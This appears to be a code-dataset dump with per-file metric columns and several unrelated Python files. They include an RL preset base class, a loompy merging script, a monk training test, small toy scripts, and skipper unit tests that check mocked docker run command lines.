| 73
| 3
| 27
| 24.333333
| 0.887097
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
7fbda9658a2a02ae0c961928cb2342d76c03e908
| 3,851
|
py
|
Python
|
all/presets/preset.py
|
kcorder/autonomous-learning-library
|
0266195fa47564e51a32087bc007bff6dda5e263
|
[
"MIT"
] | 584
|
2019-07-10T20:21:55.000Z
|
2022-03-30T22:47:57.000Z
|
all/presets/preset.py
|
kcorder/autonomous-learning-library
|
0266195fa47564e51a32087bc007bff6dda5e263
|
[
"MIT"
] | 104
|
2019-03-27T14:08:22.000Z
|
2022-01-06T18:16:23.000Z
|
all/presets/preset.py
|
kcorder/autonomous-learning-library
|
0266195fa47564e51a32087bc007bff6dda5e263
|
[
"MIT"
] | 66
|
2019-07-11T00:59:06.000Z
|
2022-03-15T05:22:57.000Z
|
from abc import ABC, abstractmethod
import torch
class Preset(ABC):
"""
A Preset Agent factory.
This class allows the user to instantiate preconfigured Agents and test Agents.
All Agents constructed by the Preset share a network model and parameters.
However, other objects, such as ReplayBuffers, are independently created for each Agent.
The Preset can be saved and loaded from disk.
"""
def __init__(self, name, device, hyperparameters):
self.name = name
self.device = device
self.hyperparameters = hyperparameters
@abstractmethod
def agent(self, writer=None, train_steps=float('inf')):
"""
Instantiate a training-mode Agent with the existing model.
Args:
writer (all.logging.Writer, optional): Coefficient for the entropy term in the total loss.
train_steps (int, optional): The number of steps for which the agent will be trained.
Returns:
all.agents.Agent: The instantiated Agent.
"""
pass
@abstractmethod
def test_agent(self):
"""
Instansiate a test-mode Agent with the existing model.
Returns:
all.agents.Agent: The instantiated test Agent.
"""
pass
def save(self, filename):
"""
Save the preset and the contained model to disk.
The preset can later be loaded using torch.load(filename), allowing
a test mode agent to be instantiated for evaluation or other purposes.
Args:
filename (str): The path where the preset should be saved.
"""
return torch.save(self, filename)
class ParallelPreset(ABC):
"""
A Preset ParallelAgent factory.
This is the ParallelAgent version of all.presets.Preset.
This class allows the user to instantiate preconfigured ParallelAgents and test Agents.
All Agents constructed by the ParallelPreset share a network model and parameters.
However, other objects, such as ReplayBuffers, are independently created for each Agent.
The ParallelPreset can be saved and loaded from disk.
"""
def __init__(self, name, device, hyperparameters):
self.name = name
self.device = device
self.hyperparameters = hyperparameters
@abstractmethod
def agent(self, writer=None, train_steps=float('inf')):
"""
Instantiate a training-mode ParallelAgent with the existing model.
Args:
writer (all.logging.Writer, optional): Coefficient for the entropy term in the total loss.
train_steps (int, optional): The number of steps for which the agent will be trained.
Returns:
all.agents.ParallelAgent: The instantiated Agent.
"""
pass
@abstractmethod
def test_agent(self):
"""
Instantiate a test-mode Agent with the existing model.
See also: ParallelPreset.parallel_test_agent()
Returns:
all.agents.Agent: The instantiated test Agent.
"""
pass
@abstractmethod
def parallel_test_agent(self):
"""
Instantiate a test-mode ParallelAgent with the existing model.
See also: ParallelPreset.test_agent()
Returns:
all.agents.ParallelAgent: The instantiated test ParallelAgent.
"""
pass
@property
def n_envs(self):
return self.hyperparameters['n_envs']
def save(self, filename):
"""
Save the preset and the contained model to disk.
The preset can later be loaded using torch.load(filename), allowing
a test mode agent to be instantiated for evaluation or other purposes.
Args:
filename (str): The path where the preset should be saved.
"""
return torch.save(self, filename)
| 31.056452
| 102
| 0.648922
| 459
| 3,851
| 5.398693
| 0.228758
| 0.029056
| 0.030266
| 0.040355
| 0.860775
| 0.853511
| 0.815981
| 0.773204
| 0.676352
| 0.59322
| 0
| 0
| 0.284601
| 3,851
| 123
| 103
| 31.308943
| 0.899456
| 0.60322
| 0
| 0.764706
| 0
| 0
| 0.010989
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.294118
| false
| 0.147059
| 0.058824
| 0.029412
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
125a11089f8476990e0c8c617753bcc008554b8d
| 6,886
|
py
|
Python
|
unused_or_abandoned/splicing/combine_velocyto_outputs.py
|
molgenis/1M-cells
|
a7ed82b5b1b308f98b7735d559abb14d95694cbb
|
[
"BSD-2-Clause"
] | 1
|
2021-12-01T10:38:49.000Z
|
2021-12-01T10:38:49.000Z
|
unused_or_abandoned/splicing/combine_velocyto_outputs.py
|
molgenis/1M-cells
|
a7ed82b5b1b308f98b7735d559abb14d95694cbb
|
[
"BSD-2-Clause"
] | null | null | null |
unused_or_abandoned/splicing/combine_velocyto_outputs.py
|
molgenis/1M-cells
|
a7ed82b5b1b308f98b7735d559abb14d95694cbb
|
[
"BSD-2-Clause"
] | null | null | null |
import loompy

# Root of the splicing working directory; every per-lane velocyto output
# lives at <ROOT>/lanes/HG19/<lane>/velocyto/<lane>.loom.
_SPLICING_DIR = '/groups/umcg-bios/tmp01/projects/1M_cells_scRNAseq/ongoing/splicing'


def _lane_loom(lane):
    # Build the velocyto .loom path for a single sequencing lane id
    # (e.g. '180920_lane1'). Deriving the paths from lane ids replaces the
    # original 53 hand-written, near-identical path literals.
    return '{root}/lanes/HG19/{lane}/velocyto/{lane}.loom'.format(root=_SPLICING_DIR, lane=lane)


# Lane ids per chemistry version — presumably 10x v2 vs v3 runs; confirm
# against the lane manifests.
_V2_LANE_IDS = [
    '180920_lane1', '180925_lane1', '180925_lane2', '180926_lane1',
    '180926_lane2', '180927_lane1', '180927_lane2', '180928_lane1',
    '180928_lane2', '181003_lane1', '181003_lane2', '181003_lane3',
    '181011_lane1', '181011_lane2', '181022_lane1', '181022_lane2',
    '181023_lane1', '181023_lane2', '181024_lane1', '181024_lane2',
    '181024_lane3', '181030_lane1', '181030_lane2', '181106_lane2',
    '181107_lane1', '181107_lane2', '181108_lane1', '181108_lane2',
    '181122_lane1', '181122_lane2', '181213_lane1', '181213_lane2',
    '181213_lane3', '181214_lane1', '181214_lane2', '181218_lane1',
    '181218_lane2', '181219_lane1', '181219_lane2', '181219_lane3',
]
_V3_LANE_IDS = [
    '190109_lane1', '190109_lane2', '190110_lane1', '190115_lane1',
    '190115_lane2', '190122_lane1', '190123_lane2', '190124_lane1',
    '190124_lane2', '190130_lane1', '190130_lane2', '190204_lane1',
    '190204_lane2',
]

# Merge each chemistry's per-lane looms into one file, matching rows on the
# gene "Accession" attribute.
looms_v2 = [_lane_loom(lane) for lane in _V2_LANE_IDS]
loom_v2_merged = _SPLICING_DIR + '/objects/loom_v2_UT_CA_and_others.loom'
loompy.combine(looms_v2, loom_v2_merged, key="Accession")
looms_v3 = [_lane_loom(lane) for lane in _V3_LANE_IDS]
loom_v3_merged = _SPLICING_DIR + '/objects/loom_v3_UT_CA_and_others.loom'
loompy.combine(looms_v3, loom_v3_merged, key="Accession")
| 491.857143
| 4,891
| 0.850712
| 1,022
| 6,886
| 5.499022
| 0.05773
| 0.097865
| 0.137011
| 0.185943
| 0.794128
| 0.794128
| 0.794128
| 0.794128
| 0.781673
| 0.781673
| 0
| 0.150286
| 0.011473
| 6,886
| 13
| 4,892
| 529.692308
| 0.675334
| 0
| 0
| 0
| 0
| 7.857143
| 0.94133
| 0.938716
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
89e404fc515c54d3c3fc7ab651611d0f7ca9f7dd
| 8,482
|
py
|
Python
|
monk/system_check_tests/keras/test_update_copy_from.py
|
Shreyashwaghe/monk_v1
|
4ee4d9483e8ffac9b73a41f3c378e5abf5fc799b
|
[
"Apache-2.0"
] | 7
|
2020-07-26T08:37:29.000Z
|
2020-10-30T10:23:11.000Z
|
monk/system_check_tests/keras/test_update_copy_from.py
|
mursalfk/monk_v1
|
62f34a52f242772186ffff7e56764e958fbcd920
|
[
"Apache-2.0"
] | 9
|
2020-01-28T21:40:39.000Z
|
2022-02-10T01:24:06.000Z
|
monk/system_check_tests/keras/test_update_copy_from.py
|
mursalfk/monk_v1
|
62f34a52f242772186ffff7e56764e958fbcd920
|
[
"Apache-2.0"
] | 1
|
2020-10-07T12:57:44.000Z
|
2020-10-07T12:57:44.000Z
|
import os
import sys
sys.path.append("../../../monk/");
import psutil
from keras_prototype import prototype
from compare_prototype import compare
from common import print_start
from common import print_status
def test_update_copy_from(system_dict):
    """Run the update-after-copy_from system checks for the keras backend.

    Sub-tests run in "forward" mode only while every previous step has
    passed; after the first failure all remaining steps are recorded as
    skipped, exactly as in the original copy-pasted stanzas.

    Args:
        system_dict (dict): mutable bookkeeping dict with the keys
            "total_tests", "successful_tests", "failed_tests_exceptions",
            "failed_tests_lists" and "skipped_tests_lists".

    Returns:
        dict: the same ``system_dict``, updated in place.
    """
    state = {"forward": True}  # flips to False on the first failing step
    ctx = {}                   # holds the prototype object created by step 1

    def _run_step(test, action):
        # Record one named sub-test: run `action` while in forward mode,
        # otherwise mark the step as skipped.
        system_dict["total_tests"] += 1
        print_start(test, system_dict["total_tests"])
        if not state["forward"]:
            system_dict["skipped_tests_lists"].append(test)
            print_status("Skipped")
            return
        try:
            action()
            system_dict["successful_tests"] += 1
            print_status("Pass")
        except Exception as e:
            system_dict["failed_tests_exceptions"].append(e)
            system_dict["failed_tests_lists"].append(test)
            state["forward"] = False
            print_status("Fail")

    def _create():
        # Step 1 creates the object every later step operates on.
        ctx["ktf"] = prototype(verbose=0)

    def _prototype():
        ctx["ktf"].Prototype("sample-project-1", "sample-experiment-2",
                             copy_from=["sample-project-1", "sample-experiment-1"])

    def _apply_transforms():
        ctx["ktf"].apply_random_horizontal_flip(train=True, val=True)
        ctx["ktf"].apply_mean_subtraction(mean=[0.485, 0.456, 0.406],
                                          train=True, val=True, test=True)

    def _update_dataset():
        ctx["ktf"].update_dataset(dataset_path=["../datasets/dataset_cats_dogs_train",
                                                "../datasets/dataset_cats_dogs_eval"])

    _run_step("update_copy_from_object_creation", _create)
    _run_step("update_copy_from_Prototype()", _prototype)
    _run_step("update_copy_from_reset_transforms()", lambda: ctx["ktf"].reset_transforms())
    _run_step("update_copy_from_apply_transforms()", _apply_transforms)
    _run_step("update_copy_from_update_dataset()", _update_dataset)
    _run_step("update_copy_from_update_input_size()", lambda: ctx["ktf"].update_input_size(224))
    _run_step("update_copy_from_update_batch_size()", lambda: ctx["ktf"].update_batch_size(6))
    _run_step("update_copy_from_update_shuffle_data()", lambda: ctx["ktf"].update_shuffle_data(False))
    _run_step("update_copy_from_update_num_processors()", lambda: ctx["ktf"].update_num_processors(16))
    _run_step("update_copy_from_update_trainval_split()", lambda: ctx["ktf"].update_trainval_split(0.6))
    _run_step("update_copy_from_Reload()", lambda: ctx["ktf"].Reload())
    _run_step("update_copy_from_EDA()", lambda: ctx["ktf"].EDA(check_missing=True, check_corrupt=True))
    _run_step("update_copy_from_Train()", lambda: ctx["ktf"].Train())
    return system_dict
| 33.132813
| 124
| 0.607522
| 964
| 8,482
| 4.996888
| 0.089212
| 0.166078
| 0.080963
| 0.107951
| 0.863816
| 0.85136
| 0.85136
| 0.85136
| 0.85136
| 0.85136
| 0
| 0.008159
| 0.263028
| 8,482
| 256
| 125
| 33.132813
| 0.762438
| 0
| 0
| 0.827273
| 0
| 0
| 0.241188
| 0.093363
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004545
| false
| 0.059091
| 0.031818
| 0
| 0.040909
| 0.245455
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
89f0ef1e1dc97e4d624e4484840bd5d830d1d158
| 284
|
py
|
Python
|
exercises/exe01 - 10/exe007.py
|
thomas-rohde/Classes-Python
|
f862995510b7aabf68bc14aecf815f597034d8a1
|
[
"MIT"
] | null | null | null |
exercises/exe01 - 10/exe007.py
|
thomas-rohde/Classes-Python
|
f862995510b7aabf68bc14aecf815f597034d8a1
|
[
"MIT"
] | null | null | null |
exercises/exe01 - 10/exe007.py
|
thomas-rohde/Classes-Python
|
f862995510b7aabf68bc14aecf815f597034d8a1
|
[
"MIT"
] | null | null | null |
# Read the base number and print its multiplication table (tabuada) from 1 to 10.
n = int(input('Selecione um n°: '))
# The template has 11 placeholders: the header value plus one per product
# 1..10. The original passed only 10 arguments (n, n*2, ..., n*10), which
# shifted every product one row early and raised IndexError on the final
# placeholder. Fix: pass n followed by n*1 .. n*10.
print('A tabuada de {} é:\n---------------------\n->1-({}) ->2-({})\n->3-({}) ->4-({})\n-------------\n->5-({}) ->6-({})\n-------------\n->7-({}) ->8-({})\n-------------\n->9-({}) ->10-({})'.format(n, *(n * i for i in range(1, 11))))
| 94.666667
| 247
| 0.292254
| 51
| 284
| 1.647059
| 0.431373
| 0.119048
| 0.071429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081081
| 0.088028
| 284
| 3
| 247
| 94.666667
| 0.239382
| 0
| 0
| 0
| 0
| 0.5
| 0.698246
| 0.470175
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
d62cf131370f0524627cb5b5acf1e3867dcc294d
| 67
|
py
|
Python
|
python-jokes.py
|
aditya270520/python-jokes
|
c51dcd8feb9cee6043bc6b9f299dce562e76c274
|
[
"MIT"
] | null | null | null |
python-jokes.py
|
aditya270520/python-jokes
|
c51dcd8feb9cee6043bc6b9f299dce562e76c274
|
[
"MIT"
] | null | null | null |
python-jokes.py
|
aditya270520/python-jokes
|
c51dcd8feb9cee6043bc6b9f299dce562e76c274
|
[
"MIT"
] | null | null | null |
# Demo of the third-party `pyjokes` library.
import pyjokes
# Print one random programming joke.
print(pyjokes.get_joke())
# Print the full joke list (get_jokes() returns a list, so this prints
# the list's repr rather than one joke per line).
print(pyjokes.get_jokes())
| 22.333333
| 26
| 0.80597
| 10
| 67
| 5.2
| 0.6
| 0.461538
| 0.576923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.044776
| 67
| 3
| 26
| 22.333333
| 0.8125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
7f05dd21f4ae15e8bc51988fac7596b7e9e25de9
| 83
|
py
|
Python
|
opencoverage/api/__init__.py
|
pavelito/opencoverage
|
ee2820dc1c5261263e8be1f041ce915e54248905
|
[
"MIT"
] | 25
|
2021-01-20T17:38:03.000Z
|
2021-12-13T22:23:22.000Z
|
opencoverage/api/__init__.py
|
pavelito/opencoverage
|
ee2820dc1c5261263e8be1f041ce915e54248905
|
[
"MIT"
] | 16
|
2021-01-23T17:51:19.000Z
|
2021-03-21T11:25:05.000Z
|
opencoverage/api/__init__.py
|
pavelito/opencoverage
|
ee2820dc1c5261263e8be1f041ce915e54248905
|
[
"MIT"
] | 6
|
2021-01-22T12:47:05.000Z
|
2022-01-27T09:49:53.000Z
|
from . import api # noqa
from . import badge # noqa
from . import upload # noqa
| 20.75
| 28
| 0.674699
| 12
| 83
| 4.666667
| 0.5
| 0.535714
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.253012
| 83
| 3
| 29
| 27.666667
| 0.903226
| 0.168675
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
617609fea285bd5b60498bae0ddca56f48ae63f8
| 27,156
|
py
|
Python
|
tests/test_runner.py
|
omertuc/skipper
|
d2e47cee6491d817e9235593564ae3fff334ec4c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_runner.py
|
omertuc/skipper
|
d2e47cee6491d817e9235593564ae3fff334ec4c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_runner.py
|
omertuc/skipper
|
d2e47cee6491d817e9235593564ae3fff334ec4c
|
[
"Apache-2.0"
] | null | null | null |
import sys
import os
import unittest
import mock
from skipper import utils
from skipper import runner
from skipper.runner import get_default_net
# Fixture constants shared by the runner tests below.
USER_ID = 1000
GROUP_ID = 2000
REGISTRY = 'registry.io:5000'
IMAGE = 'image'
TAG = '1234567'
# Fully-qualified image reference: 'registry.io:5000/image:1234567'.
FQDN_IMAGE = REGISTRY + '/' + IMAGE + ':' + TAG
WORKDIR = '/home/adir/work'
HOME_DIR = '/home/adir'
PROJECT = 'proj'
PROJECT_DIR = os.path.join(WORKDIR, PROJECT)
# Sample environment variables passed as KEY=VALUE pairs and via env files.
ENV = ["KEY1=VAL1", "KEY2=VAL2"]
ENV_FILE_PATH = '/home/envfile.env'
ENV_FILES = [ENV_FILE_PATH, ENV_FILE_PATH]
def get_volume_mapping(volume_mapping):
    """Return the expected host-side form of *volume_mapping*.

    On Darwin, paths under /etc/ or /var/lib/ are returned with a
    '/private' prefix (NOTE(review): presumably because macOS keeps these
    as symlinks into /private — confirm); everywhere else, and for all
    other paths, the mapping is returned unchanged.
    """
    needs_private_prefix = (
        sys.platform == 'darwin'
        and volume_mapping.startswith(('/etc/', '/var/lib/'))
    )
    return '/private' + volume_mapping if needs_private_prefix else volume_mapping
class TestRunner(unittest.TestCase):
    """Tests for skipper.runner covering plain and container-nested runs.

    The docker CLI is never executed: subprocess.Popen/check_output are
    mocked and the tests assert on the exact command line runner.run()
    builds.  The expected command lines and the mock priming were
    previously duplicated verbatim across nine tests; they now come from
    the private helpers below.
    """

    # Canned `docker network ls` output for the net-exists / net-missing cases.
    NET_LS = 'NETWORK ID NAME DRIVER SCOPE\n' \
             '8c954c27cf41 host host local\n'
    NET_NOT_EXISTS = 'NETWORK ID NAME DRIVER SCOPE\n'

    # Host volumes runner.run() mounts by default, in the order it emits them.
    DEFAULT_VOLUMES = [
        '%(homedir)s/.netrc:%(homedir)s/.netrc:ro' % dict(homedir=HOME_DIR),
        '%(homedir)s/.gitconfig:%(homedir)s/.gitconfig:ro' % dict(homedir=HOME_DIR),
        '%(homedir)s/.docker/config.json:%(homedir)s/.docker/config.json:ro' % dict(homedir=HOME_DIR),
        '/etc/docker:/etc/docker:ro',
        '%(workdir)s:%(workdir)s:rw' % dict(workdir=WORKDIR),
        '/var/run/docker.sock:/var/run/docker.sock:rw',
        'entrypoint.sh:/opt/skipper/skipper-entrypoint.sh',
        '/var/lib/osmosis:/var/lib/osmosis:rw',
    ]

    def setUp(self):
        self.runtime = "docker"
        utils.CONTAINER_RUNTIME_COMMAND = self.runtime
        os.environ['KEEP_CONTAINERS'] = 'True'

    def tearDown(self):
        # setUp mutates the process environment; restore it so the leak
        # cannot influence unrelated tests.
        os.environ.pop('KEEP_CONTAINERS', None)

    def _prime_mocks(self, resource_filename_mock, check_output_mock, popen_mock,
                     grp_getgrnam_mock, os_getuid_mock, check_output_values=None):
        """Configure the mock behavior shared by all nested-run tests.

        check_output_values overrides the `docker network ls` replies;
        the default simulates the skipper network already existing.
        """
        resource_filename_mock.return_value = "entrypoint.sh"
        check_output_mock.side_effect = (
            [self.NET_LS, ''] if check_output_values is None else check_output_values)
        popen_mock.return_value.stdout.readline.side_effect = ['aaa', 'bbb', 'ccc', '']
        popen_mock.return_value.poll.return_value = -1
        grp_getgrnam_mock.return_value.gr_gid = 978
        os_getuid_mock.return_value = USER_ID

    @staticmethod
    def _env_flags(env_vars):
        """Expand KEY=VAL pairs into ['-e', 'KEY=VAL', ...] docker arguments."""
        flags = []
        for var in env_vars:
            flags += ['-e', var]
        return flags

    @staticmethod
    def _volume_flags(volumes, apply_mapping=True):
        """Expand volume specs into ['-v', spec, ...] docker arguments.

        apply_mapping selects whether the darwin /private adjustment from
        get_volume_mapping() is expected to have been applied.
        """
        flags = []
        for volume in volumes:
            flags += ['-v', get_volume_mapping(volume) if apply_mapping else volume]
        return flags

    def _expected_command(self, command, net, name=None, interactive=False,
                          env=(), env_files=(), volume_flags=None):
        """Build the full docker command line runner.run() must produce.

        command is the already-joined command string; volume_flags
        defaults to the mapped DEFAULT_VOLUMES.
        """
        expected = ['docker', 'run']
        if name is not None:
            expected += ['--name', name]
        if interactive:
            expected += ['-i', '-e', 'SKIPPER_INTERACTIVE=True']
        expected += ['-t', '-e', 'KEEP_CONTAINERS=True', '--privileged', '--net', net]
        expected += self._env_flags(env)
        for env_file in env_files:
            expected += ['--env-file', env_file]
        expected += [
            '-e', 'SKIPPER_USERNAME=testuser',
            '-e', 'SKIPPER_UID=%(user_uid)s' % dict(user_uid=USER_ID),
            '-e', 'HOME=%(homedir)s' % dict(homedir=HOME_DIR),
            '-e', 'SKIPPER_DOCKER_GID=978',
        ]
        expected += (self._volume_flags(self.DEFAULT_VOLUMES)
                     if volume_flags is None else volume_flags)
        expected += [
            '-w', PROJECT_DIR,
            '--entrypoint', '/opt/skipper/skipper-entrypoint.sh',
            FQDN_IMAGE,
            command,
        ]
        return expected

    @mock.patch('subprocess.Popen', autospec=False)
    def test_run_simple_command_not_nested(self, popen_mock):
        """Without an image, the command runs directly under the runtime."""
        popen_mock.return_value.stdout.readline.side_effect = ['aaa', 'bbb', 'ccc', '']
        popen_mock.return_value.poll.return_value = -1
        command = ['pwd']
        runner.run(command)
        popen_mock.assert_called_once_with([self.runtime] + command)

    @mock.patch('subprocess.Popen', autospec=False)
    def test_run_complex_command_not_nested(self, popen_mock):
        """A multi-word command is passed through unchanged when not nested."""
        popen_mock.return_value.stdout.readline.side_effect = ['aaa', 'bbb', 'ccc', '']
        popen_mock.return_value.poll.return_value = -1
        command = ['ls -l']
        runner.run(command)
        popen_mock.assert_called_once_with([self.runtime] + command)

    @mock.patch('os.path.exists', mock.MagicMock(autospec=True, return_value=True))
    @mock.patch('getpass.getuser', mock.MagicMock(autospec=True, return_value='testuser'))
    @mock.patch('os.getcwd', mock.MagicMock(autospec=True, return_value=PROJECT_DIR))
    @mock.patch('os.path.expanduser', mock.MagicMock(autospec=True, return_value=HOME_DIR))
    @mock.patch('os.getuid', autospec=True)
    @mock.patch('grp.getgrnam', autospec=True)
    @mock.patch('subprocess.Popen', autospec=False)
    @mock.patch('subprocess.check_output', autospec=False)
    @mock.patch('pkg_resources.resource_filename', autospec=False)
    def test_run_simple_command_nested_network_exist(self, resource_filename_mock, check_output_mock,
                                                     popen_mock, grp_getgrnam_mock, os_getuid_mock):
        """Nested run reuses the existing skipper network."""
        self._prime_mocks(resource_filename_mock, check_output_mock, popen_mock,
                          grp_getgrnam_mock, os_getuid_mock)
        runner.run(['pwd'], FQDN_IMAGE)
        popen_mock.assert_called_once_with(
            self._expected_command('pwd', get_default_net()))

    @mock.patch('os.path.exists', mock.MagicMock(autospec=True, return_value=True))
    @mock.patch('getpass.getuser', mock.MagicMock(autospec=True, return_value='testuser'))
    @mock.patch('os.getcwd', mock.MagicMock(autospec=True, return_value=PROJECT_DIR))
    @mock.patch('os.path.expanduser', mock.MagicMock(autospec=True, return_value=HOME_DIR))
    @mock.patch('os.getuid', autospec=True)
    @mock.patch('grp.getgrnam', autospec=True)
    @mock.patch('subprocess.Popen', autospec=False)
    @mock.patch('subprocess.check_output', autospec=False)
    @mock.patch('pkg_resources.resource_filename', autospec=False)
    def test_run_simple_command_nested_network_not_exist(self, resource_filename_mock,
                                                         check_output_mock, popen_mock, grp_getgrnam_mock, os_getuid_mock):
        """A missing skipper network is created before the nested run."""
        self._prime_mocks(resource_filename_mock, check_output_mock, popen_mock,
                          grp_getgrnam_mock, os_getuid_mock,
                          check_output_values=[self.NET_NOT_EXISTS, 'new-net-hash', ''])
        runner.run(['pwd'], FQDN_IMAGE)
        popen_mock.assert_called_once_with(
            self._expected_command('pwd', get_default_net()))

    @mock.patch('os.path.exists', mock.MagicMock(autospec=True, return_value=True))
    @mock.patch('getpass.getuser', mock.MagicMock(autospec=True, return_value='testuser'))
    @mock.patch('os.getcwd', mock.MagicMock(autospec=True, return_value=PROJECT_DIR))
    @mock.patch('os.path.expanduser', mock.MagicMock(autospec=True, return_value=HOME_DIR))
    @mock.patch('os.getuid', autospec=True)
    @mock.patch('grp.getgrnam', autospec=True)
    @mock.patch('subprocess.Popen', autospec=False)
    @mock.patch('subprocess.check_output', autospec=False)
    @mock.patch('pkg_resources.resource_filename', autospec=False)
    def test_run_simple_command_nested_with_env(self, resource_filename_mock, check_output_mock, popen_mock, grp_getgrnam_mock, os_getuid_mock):
        """Extra KEY=VAL environment entries become '-e' arguments."""
        self._prime_mocks(resource_filename_mock, check_output_mock, popen_mock,
                          grp_getgrnam_mock, os_getuid_mock)
        runner.run(['pwd'], FQDN_IMAGE, ENV)
        popen_mock.assert_called_once_with(
            self._expected_command('pwd', get_default_net(), env=ENV))

    @mock.patch('os.path.exists',
                mock.MagicMock(autospec=True, return_value=True))
    @mock.patch('getpass.getuser',
                mock.MagicMock(autospec=True, return_value='testuser'))
    @mock.patch('os.getcwd',
                mock.MagicMock(autospec=True, return_value=PROJECT_DIR))
    @mock.patch('os.path.expanduser',
                mock.MagicMock(autospec=True, return_value=HOME_DIR))
    @mock.patch('os.getuid', autospec=True)
    @mock.patch('grp.getgrnam', autospec=True)
    @mock.patch('subprocess.Popen', autospec=False)
    @mock.patch('subprocess.check_output', autospec=False)
    @mock.patch('pkg_resources.resource_filename', autospec=False)
    def test_run_simple_command_nested_with_env_file(
        self, resource_filename_mock, check_output_mock, popen_mock,
        grp_getgrnam_mock, os_getuid_mock
    ):
        """A single env_file is forwarded as one '--env-file' argument."""
        self._prime_mocks(resource_filename_mock, check_output_mock, popen_mock,
                          grp_getgrnam_mock, os_getuid_mock)
        runner.run(['pwd'], FQDN_IMAGE, env_file=[ENV_FILE_PATH])
        popen_mock.assert_called_once_with(
            self._expected_command('pwd', get_default_net(),
                                   env_files=[ENV_FILE_PATH]))

    @mock.patch('os.path.exists',
                mock.MagicMock(autospec=True, return_value=True))
    @mock.patch('getpass.getuser',
                mock.MagicMock(autospec=True, return_value='testuser'))
    @mock.patch('os.getcwd',
                mock.MagicMock(autospec=True, return_value=PROJECT_DIR))
    @mock.patch('os.path.expanduser',
                mock.MagicMock(autospec=True, return_value=HOME_DIR))
    @mock.patch('os.getuid', autospec=True)
    @mock.patch('grp.getgrnam', autospec=True)
    @mock.patch('subprocess.Popen', autospec=False)
    @mock.patch('subprocess.check_output', autospec=False)
    @mock.patch('pkg_resources.resource_filename', autospec=False)
    def test_run_simple_command_nested_with_multiple_env_files(
        self, resource_filename_mock, check_output_mock, popen_mock,
        grp_getgrnam_mock, os_getuid_mock
    ):
        """Every env_file entry yields its own '--env-file' argument.

        NOTE(review): this expectation, as in the original test, uses the
        literal 'host' network and the raw (un-mapped) volume specs.
        """
        self._prime_mocks(resource_filename_mock, check_output_mock, popen_mock,
                          grp_getgrnam_mock, os_getuid_mock)
        runner.run(['pwd'], FQDN_IMAGE, env_file=ENV_FILES)
        popen_mock.assert_called_once_with(
            self._expected_command(
                'pwd', 'host', env_files=ENV_FILES,
                volume_flags=self._volume_flags(self.DEFAULT_VOLUMES,
                                                apply_mapping=False)))

    @mock.patch('os.path.exists', mock.MagicMock(autospec=True, return_value=True))
    @mock.patch('getpass.getuser', mock.MagicMock(autospec=True, return_value='testuser'))
    @mock.patch('os.getcwd', mock.MagicMock(autospec=True, return_value=PROJECT_DIR))
    @mock.patch('os.path.expanduser', mock.MagicMock(autospec=True, return_value=HOME_DIR))
    @mock.patch('os.getuid', autospec=True)
    @mock.patch('grp.getgrnam', autospec=True)
    @mock.patch('subprocess.Popen', autospec=False)
    @mock.patch('subprocess.check_output', autospec=False)
    @mock.patch('pkg_resources.resource_filename', autospec=False)
    def test_run_simple_command_nested_interactive(self, resource_filename_mock,
                                                   check_output_mock, popen_mock, grp_getgrnam_mock, os_getuid_mock):
        """interactive=True adds '-i' and the SKIPPER_INTERACTIVE marker."""
